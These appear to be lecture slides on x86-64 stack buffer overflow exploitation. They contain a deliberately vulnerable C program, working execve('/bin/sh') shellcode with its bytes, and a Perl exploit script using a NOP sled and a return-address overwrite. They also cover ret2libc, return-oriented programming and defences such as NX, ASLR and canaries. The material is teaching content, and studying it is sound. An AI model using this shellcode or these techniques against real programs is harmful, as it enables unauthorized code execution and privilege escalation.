Buffer Overflows ---------------- Slides inspired by Nelson Elhage, MIT 2008. stuff.mit.edu/iap/2009/exploit/stack.pdf But this will be an x86-64 version. --------------- C vulnerability basics: - Many standard library functions don't check that target arrays are big enough (e.g.: strcpy, sprintf, scanf, memcpy, ...) - Main reason for this: pointers don't carry length information about entity they point to. - A secondary reason: strings are null-terminated; length isn't available without traversing string. -------- A vulnerable C program: #include #include void say_hello(char *name) { char buf[128]; sprintf(buf, "Hello, %s", name); printf("%s!\n", buf); } int main (int argc, char **argv) { if (argc >=2) say_hello(argv[1]); } ------------------ Reminder: basic layout of memory: (in all pictures, lower addresses are at bottom) ------ stack | V ------ ^ | heap ------ code ------ stack contains return addresses and local data ----------------- X86-64 calling convention: %rsp is the stack pointer stack grows down arguments passed in %rdi, %rsi, %rdx, ... %rbp is the "frame pointer" and points to top of a function's stack frame (NB Not always used, e.g. in -O2) %rax gets return value --------------- Calling convention: foo (1,2,3); movq $1, %rdi movq $2, %rsi movq $3, %rdx call foo // pushes ret addr on stack and jumps to foo ----------------- Prologue and epilogue: foo: pushq %rbp movq %rsp, %rbp subq $, %rsp ... movq %rbp, %rsp // or popl %rbp // "restore" ret // pops ret addr and jumps there ------------ Stack: ^ higher addrs | ----------------- return addr ----------------- saved frame pointer <- %ebp -------------------- first local variable . . last local variable <- %esp --------------------- stack grows | V --------------------------- Stack for say_hello: ^ higher addrs | ----------------- return addr ----------------- saved frame pointer <- %ebp -------------------- buf (128 bytes) --------------------- stack grows | V If we write past the end of bufm, we can trash the return address! ----------------------- Getting a shell: - For the sake of exmaple, we'll just get the target to call "/bin/sh" - Use the raw execve system call - execve (char *file, char **argv, char **envp) - execve ("/bin/sh", ["/bin/sh", NULL], NULL) NOTE: This is only interesting is we get some kind of privilege escalation... ------------------------ Linux X86-64 system call convention: - Use "syscall" instruction - System call number in %rax - Arguments in %rdi, %rsi, %rdx, ... - Return value in %rax - Syscall number for exeve (__NR_execve in usr/include/asm/unistd_64.h) is 59 = 0x3b ------------------------- Shellcode = the code we write that will invoke the system call to get a shell (more generically, the exploit code we want to execute) - Must be position-independent -- store data on the stack - (in our case) must not contain NULs, because we're using a broken string routine (sprintf) to move the code into place - various encoding tricks, eg.: movl $0, %eax ==> xorl %eax, %eax ------------------------ Shellcode will build this stack: .... --------- t: "/bin/sh" <-- %rdi [with trailing \0] _________ 0 --------- t <--- %rsi, %rsp --------- Watch out for little-endian conventions! ------------------ The shellcode: movabsq $0x68732f6e69622f20, %rax // " /bin/sh" shr $8,%rax // shr to "/bin/sh\0" pushq %rax movq %rsp, %rdi // %rdi <- "/bin/sh" xorq %rax,%rax // %rax <- 0 pushq %rax pushq %rdi movq %rsp, %rsi // %rsi <- argv (singleton array containing "/bin/sh") movq %rax, %rdx // %rdi <- envp (empty) addq $0x3b, %rax // %rax <- __NR_execve syscall ---------------------- apt@white-flipper:~/491/elhage$ gcc -c shellcode.S apt@white-flipper:~/491/elhage$ objdump -S shellcode.o shellcode.o: file format elf64-x86-64 Disassembly of section .text: 0000000000000000
: 0: 48 b8 20 2f 62 69 6e movabs $0x68732f6e69622f20,%rax 7: 2f 73 68 a: 48 c1 e8 08 shr $0x8,%rax e: 50 push %rax f: 48 89 e7 mov %rsp,%rdi 12: 48 31 c0 xor %rax,%rax 15: 50 push %rax 16: 57 push %rdi 17: 48 89 e6 mov %rsp,%rsi 1a: 48 89 c2 mov %rax,%rdx 1d: 48 83 c0 3b add $0x3b,%rax 21: 0f 05 syscall ---------------------------------------------- So the plan is fill the stack like this: <- initial value of %rsp when shellcode starts ---------------- pointer to buf <- return address ---------------- NOPs <- fp ---------------- NOPs --------------- shellcode --------------- NOPs --------------- <- buf We put NOPs (0x90) in below the shellcode because we don't know exactly where buf lives, and this gives us some margin for error We put enough NOP's above the shellcode so that there there will be room for the shellcode's stack (3 x 8-byte entries in this case). --------------------- hackit.pl: #!/usr/bin/perl my $shellcode = "\x48\xb8\x20\x2f\x62\x69\x6e" . "\x2f\x73\x68" . "\x48\xc1\xe8\x08" . "\x50" . "\x48\x89\xe7" . "\x48\x31\xc0" . "\x50" . "\x57" . "\x48\x89\xe6" . "\x48\x89\xc2" . "\x48\x83\xc0\x3b" . "\x0f\x05" . ("\x90" x 24); my $landing = hex(`./getsp`) - 250; #printf "landing = %x\n", $landing; my $buffer = ("\x90" x (136 - length($shellcode) - length("Hello, "))) . $shellcode; $buffer .= pack("Q", $landing) ; # the two high order nibbles are 0's, but that should be ok #exec("echo", $buffer); exec("./hello1",$buffer) -------------------------------- To estimate the landing spot, we need to know where the stack starts for an arbitrary program: getsp.c: #include int main () { unsigned long int rsp; __asm__("movq %%rsp, %0" : "=r"(rsp)); printf("0x%016lx", rsp); return 0; } -------------------------- Demo! ---------------------------- Analysis: what went wrong here? - no bounds checking in C - mixed data and control information - ability to execute data (on stack) as code ---------------------------- Countermeasures: No-exec stack Address-space layout randomization Stack guards Note: these are all in place by default; had to turn them off to get the demo to work. ----------------------------- Non-executable stack - (Most) normal programs never need to execute code on the stack - So why not disallow it? - Requires HW support (only added fairly recently in x86) - Demo (remove -z execstack) -------------------------------- Counter-countermeasure: ret2libc - Maybe we don't need to run our own code - hello links in libc - the standard system() library function can spawn /bin/sh for us - get say_hello to return there instead - issue: how to pass desired argument ----------------- On old x86 (32 bit) arguments were passed on the stack rather than in registers. (They live just above return address) That makes it easy: t (approx) <- argument for system ---------------- AAAA <- fake return address for system ---------------- addr of system() <- return address for say_hello ---------------- spaces <- fp t: "/bin/sh;" spaces --------------- <- buf ------------------ Alas, on x86-64, there's no way to feed the necessary address into %rdi . Or is there? What if we can find a fragment of code in the library of the form u: pop %rdi; ret ?? Then we can set up the stack as follows: ---------------- addr of system() <- return address for u's ret instruction ---------------- t (approx) <- will be popped by u into %rdi -------------- addr of u <- return address for say_hello ---------------- spaces <- fp t: "/bin/sh;" spaces --------------- <- buf ------------------------ Return-oriented programming: Yes, we can typically find such a fragment! In fact, more generally, we can find fragments to do all the things we want to do, just before a return. Then we can construct a program just by putting addresses of this form on the stack. ------------------------------------ Address-space Layout Randomization: - Attacks depend on our being able to: guess the landing address in buf on stack. - ret2libc attack needed address of "system", "u" fragments, etc. - But correct programs don't depend on stack locations - And dynamic linker can already handle flexible code locations - So how about we randomize addresses of stack and code blocks? (Doesn't require HW support) - Now typically enabled by default on linux: can turn off using "setarch -RL" ----------------------------------- Counter-counter measures: - There are other ways to hide exploit on the stack that don't require knowing the sp. - If address space isn't too large, can just keep guessing addresses of system or code fragments. (Feasible for x86-32; not so much for 64bit address space!) - There are often exploitable bugs in "random" address generation. -------------------------------------- Stack guards: - All the attacks depend on overwriting return address. - Can we protect it from modification, or at least notice? ---------------------- Canaries (stackguard, Crispin Cowan): - Insert a known (typically random) value between locals and return address. - Known as a "canary" - Before returning, check to see that canary is unchanged. ----------------- return addr ----------------- saved frame pointer <- %ebp ------------------- canary -------------------- first local variable . . last local variable <- %esp --------------------- - In recent gcc's, -fstack-protector does this, and also: reorders stack variables so that arrays all live *above* other vars, and args are copied to safe (low) locations on the stack. Counter-countermeasures against stack guard: harder, but sometimes can still exploit overwriting of data. ----------------------------------------- Another simple idea: use two stacks, one for control, the other for data. (Mainly a research idea now.) ----------------------------